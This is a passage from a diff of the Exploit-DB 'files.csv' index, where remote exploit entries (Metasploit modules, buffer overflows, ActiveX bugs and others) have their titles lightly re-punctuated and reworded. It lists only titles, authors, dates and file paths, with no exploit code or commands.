Overflow",2007-10-10,bangus/magnum,linux,remote,0 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 @@ -10675,7 +10677,7 @@ id,file,description,date,author,platform,type,port 33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS 1.1 - Remote File Access",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 10083,platforms/php/remote/10083.txt,"PHP 5.3 - 'preg_match()' Full Path Disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 -10086,platforms/multiple/remote/10086.txt,"WebKit - 'Document()' Function Remote Information Disclosure",2009-11-12,"Chris Evans",multiple,remote,0 +10086,platforms/multiple/remote/10086.txt,"WebKit - 'Document()' Remote Information Disclosure",2009-11-12,"Chris Evans",multiple,remote,0 10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave Player 11.5.1.601 - Multiple Code Execution",2009-11-04,"Francis Provencher",multiple,remote,0 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 < 3.3.5 - Format String / Security Bypass",2009-11-13,"Jeremy Allison",multiple,remote,0 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 @@ -10730,7 +10732,7 @@ id,file,description,date,author,platform,type,port 11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0 11500,platforms/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - (HTTP) Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0 11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0 -11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0 +11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0 @@ -10740,7 +10742,7 @@ id,file,description,date,author,platform,type,port 11694,platforms/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",windows,remote,0 11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Code Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 -11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' 'OpenFile()' Remote Overflow",2010-03-15,mr_me,windows,remote,0 +11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll OpenFile()' Remote Overflow",2010-03-15,mr_me,windows,remote,0 11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,multiple,remote,0 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 @@ -10782,7 +10784,7 @@ id,file,description,date,author,platform,type,port 12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0 12367,platforms/windows/remote/12367.html,"HP Digital Imaging - 'hpodio08.dll' Insecure Method Exploit",2010-04-24,"ThE g0bL!N",windows,remote,0 12380,platforms/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0 -12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - 'AntCore.dll' 'RegisterCom()' Remote Heap Overflow",2010-04-27,mr_me,windows,remote,0 +12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - 'AntCore.dll RegisterCom()' Remote Heap Overflow",2010-04-27,mr_me,windows,remote,0 12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0 @@ -10903,7 +10905,7 @@ id,file,description,date,author,platform,type,port 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent - Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 15265,platforms/asp/remote/15265.rb,"Microsoft ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce (MS10-012)",2010-10-17,"Hernan Ochoa",windows,remote,0 -15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 +15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 15292,platforms/windows/remote/15292.rb,"Microsoft ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory Corruption",2010-10-21,Abysssec,windows,remote,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 @@ -11359,7 +11361,7 @@ id,file,description,date,author,platform,type,port 16729,platforms/windows/remote/16729.rb,"SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 -16732,platforms/windows/remote/16732.rb,"httpdx - 'tolog()' Function Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0 +16732,platforms/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 @@ -11419,12 +11421,12 @@ id,file,description,date,author,platform,type,port 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 -16794,platforms/windows/remote/16794.rb,"httpdx - 'tolog()' Function Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80 +16794,platforms/windows/remote/16794.rb,"httpdx - 'tolog()' Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovalarm.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16798,platforms/windows/remote/16798.rb,"Apache Tomcat mod_jk 1.2.20 - Buffer Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 -16799,platforms/windows/remote/16799.rb,"httpdx - 'h_handlepeer()' Function Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 +16799,platforms/windows/remote/16799.rb,"httpdx - 'h_handlepeer()' Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)",2010-06-11,Metasploit,windows,remote,8000 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5250 16802,platforms/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 @@ -11462,7 +11464,7 @@ id,file,description,date,author,platform,type,port 16834,platforms/linux/remote/16834.rb,"Snort Back Orifice - Pre-Preprocessor Remote Exploit (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16835,platforms/linux/remote/16835.rb,"Madwifi - SIOCGIWSCAN Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 -16837,platforms/linux/remote/16837.rb,"hplip - hpssd.py From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,linux,remote,0 +16837,platforms/linux/remote/16837.rb,"hplip - 'hpssd.py' From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,linux,remote,0 16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)",2011-03-03,Metasploit,linux,remote,0 16839,platforms/linux/remote/16839.rb,"Borland Interbase - 'PWD_db_aliased()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16840,platforms/linux/remote/16840.rb,"Borland Interbase - 'open_marker_file()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 @@ -11496,7 +11498,7 @@ id,file,description,date,author,platform,type,port 16871,platforms/osx/remote/16871.rb,"Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)",2011-01-08,Metasploit,osx,remote,0 16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0 16873,platforms/osx/remote/16873.rb,"Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 -16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 +16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0 16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0 @@ -11533,18 +11535,18 @@ id,file,description,date,author,platform,type,port 17024,platforms/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17027,platforms/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17028,platforms/windows/remote/17028.rb,"HP OpenView Network Node Manager (OV NNM) - nnmRptConfig nameParams Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17029,platforms/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'OvJavaLocale' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17030,platforms/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'execvp' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17029,platforms/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe OvJavaLocale' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17030,platforms/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe execvp' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17031,platforms/linux/remote/17031.rb,"Distributed Ruby - send syscall (Metasploit)",2011-03-23,Metasploit,linux,remote,0 17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 -17038,platforms/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe' 'schdParams' Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 +17038,platforms/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe schdParams' Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 -17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'ICount' CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 -17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'main' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 +17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe ICount' CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 +17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe main' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' (MaxAge) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' Unrecognized Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'ovutil' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'Hostname' CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0 +17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe ovutil' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe Hostname' CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0 17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution (Metasploit)",2011-03-27,Metasploit,linux,remote,0 @@ -11567,7 +11569,7 @@ id,file,description,date,author,platform,type,port 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)",2011-04-27,Metasploit,windows,remote,18821 17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0 17240,platforms/windows/remote/17240.html,"ICONICS WebHMI - ActiveX Stack Overflow",2011-05-03,"sgb and bls",windows,remote,0 -17244,platforms/hardware/remote/17244.txt,"ZyWALL USG - Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0 +17244,platforms/hardware/remote/17244.txt,"ZyWALL USG Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0 17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow (Metasploit)",2011-05-11,Metasploit,windows,remote,0 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI - ActiveX Buffer Overflow (Metasploit)",2011-05-10,Metasploit,windows,remote,0 @@ -11667,9 +11669,9 @@ id,file,description,date,author,platform,type,port 17886,platforms/windows/remote/17886.py,"Freefloat FTP Server - Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0 -17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0 +17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - LIST Remote Buffer Overflow (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0 -17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 +17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0 @@ -11748,7 +11750,7 @@ id,file,description,date,author,platform,type,port 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow",2012-03-03,Vulnerability-Lab,windows,remote,0 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH 'Username' Buffer Overflow (Metasploit)",2012-03-04,Metasploit,windows,remote,0 18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 -18572,platforms/windows/remote/18572.rb,"Adobe Flash Player - '.mp4' 'cprt' Overflow (Metasploit)",2012-03-08,Metasploit,windows,remote,0 +18572,platforms/windows/remote/18572.rb,"Adobe Flash Player - '.mp4 cprt' Overflow (Metasploit)",2012-03-08,Metasploit,windows,remote,0 18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Account Scanner / 'PUT' Request Remote Exploit",2012-03-19,kingcope,multiple,remote,0 18604,platforms/windows/remote/18604.rb,"Netmechanica NetDecision HTTP Server 4.5.1 - Buffer Overflow (Metasploit)",2012-03-15,Metasploit,windows,remote,0 18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure",2012-03-16,KaHPeSeSe,windows,remote,0 @@ -12223,7 +12225,7 @@ id,file,description,date,author,platform,type,port 20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal",2000-09-21,anon,multiple,remote,8002 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Buffer Overflow",2000-09-21,blackangels,windows,remote,0 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,linux,remote,0 -20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - 'From:' Field Buffer Overflow",2000-09-23,Arkane,linux,remote,0 +20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - 'From:' Buffer Overflow",2000-09-23,Arkane,linux,remote,0 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 - Domain Modification",2000-09-24,"Weihan Leow",cgi,remote,0 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 - Embedded OCX Control",2000-09-26,"Ussr Labs",windows,remote,0 20242,platforms/cgi/remote/20242.txt,"Unixware 7.0 - SCOhelp HTTP Server Format String",2000-09-26,"Juliano Rizzo",cgi,remote,0 @@ -12351,7 +12353,7 @@ id,file,description,date,author,platform,type,port 20513,platforms/multiple/remote/20513.txt,"iCat Electronic Commerce Suite 3.0 - File Disclosure",1997-11-08,"Mikael Johansson",multiple,remote,0 20516,platforms/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0 20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0 -20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' Function File Disclosure",2000-12-23,bt,cgi,remote,0 +20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,cgi,remote,0 20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0 20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 @@ -12808,7 +12810,7 @@ id,file,description,date,author,platform,type,port 21649,platforms/multiple/remote/21649.txt,"Cacheflow CacheOS 3.1.x/4.0.x/4.1 - Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,multiple,remote,0 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 - sp_MScopyscript SQL Injection",2002-07-25,"Cesar Cerrudo",windows,remote,0 21652,platforms/windows/remote/21652.cpp,"Microsoft SQL Server 2000 - Resolution Service Heap Overflow",2002-07-25,"David Litchfield",windows,remote,0 -21654,platforms/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 - Web Messaging HTTP Get Buffer Overflow",2002-07-25,anonymous,windows,remote,0 +21654,platforms/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 - Web Messaging GET Buffer Overflow",2002-07-25,anonymous,windows,remote,0 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0 @@ -12840,7 +12842,7 @@ id,file,description,date,author,platform,type,port 21722,platforms/linux/remote/21722.pl,"Lynx 2.8.x - Command Line URL CRLF Injection",2002-08-19,"Ulf Harnhammar",linux,remote,0 21725,platforms/linux/remote/21725.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (1)",2002-08-19,g0thm0g,linux,remote,0 21726,platforms/linux/remote/21726.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (2)",2002-10-05,st0ic,linux,remote,0 -21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 - HTTP Post Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",novell,remote,0 +21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 - POST Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",novell,remote,0 21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 - JSP Request Cross-Site Scripting",2002-08-21,Skinnay,unix,remote,0 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0 21748,platforms/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting - ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0 @@ -12853,7 +12855,7 @@ id,file,description,date,author,platform,type,port 21757,platforms/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0 21759,platforms/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0 21764,platforms/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote,0 -21765,platforms/linux/remote/21765.pl,"Webmin 0.x - 'RPC' Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0 +21765,platforms/linux/remote/21765.pl,"Webmin 0.x - 'RPC' Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0 21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",multiple,remote,0 21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0 21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0 @@ -12877,7 +12879,7 @@ id,file,description,date,author,platform,type,port 21841,platforms/windows/remote/21841.rb,"NTR - ActiveX Control 'Check()' Method Buffer Overflow (Metasploit)",2012-10-10,Metasploit,windows,remote,0 21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management - 'XGO.ocx' ActiveX 'SetShapeNodeType()' Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0 21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution (Metasploit)",2012-10-10,Metasploit,java,remote,7001 -21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0 +21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - 'ImageUpload.ashx' Remote Command Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0 21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog - Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,444 21850,platforms/linux/remote/21850.rb,"Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,linux,remote,0 21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - 